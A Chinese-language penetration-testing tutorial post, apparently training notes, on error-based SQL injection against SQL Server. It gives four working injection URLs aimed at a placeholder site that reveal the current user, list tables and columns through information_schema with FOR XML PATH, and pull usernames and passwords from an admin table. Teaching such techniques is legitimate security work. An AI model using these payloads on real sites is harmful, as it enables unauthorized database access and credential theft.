[原创]WEB安全第四章SQL注入篇12 sqlserver 快速爆表、爆列、爆数据
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
这些笔记是在做培训的时候 教程里的笔记,有些语句没有图片搭配,可能理解不够,请见谅
WEB安全第四章SQL注入篇12 sqlserver 快速爆表-爆列-爆数据
在SQL_SERVER 中 每个数据库中都有 视图->系统视图
在这个下面都有很多关于这个库的表,表里面存放了很多关于这个库的信息。
COLUMNS 列
TABLES 表
![[原创]WEB安全第四章SQL注入篇12 sqlserver 快速爆表、爆列、爆数据](https://www.moonsec.com/wp-content/uploads/2019/11/image001-3.png)
![[原创]WEB安全第四章SQL注入篇12 sqlserver 快速爆表、爆列、爆数据](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
1、查询当前用户
http://www.demo1.com/index.aspx?id=1 and user_name()>1
2、根据当前用户爆出所有表
http://www.demo1.com/index.aspx?id=1 and(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=’dbo’ FOR XML PATH)>1
3、爆出所有的列
http://www.demo1.com/index.aspx?id=1 and(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=’admin’ FOR XML PATH)>1
![[原创]WEB安全第四章SQL注入篇12 sqlserver 快速爆表、爆列、爆数据](https://www.moonsec.com/wp-content/uploads/2019/11/image002-2.png)
4、爆出数据
http://www.demo1.com/index.aspx?id=1 and ( select username,password from admin FOR XML PATH)>1
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/137.html
赞 (4)
mOon
[原创]WEB安全第四章SQL注入篇13 sqlserver执行系统命令
« 上一篇
2019年11月26日 am11:25
[原创]WEB安全第四章SQL注入篇11 sqlserver 报错注入
下一篇 »
2019年11月26日 am11:39
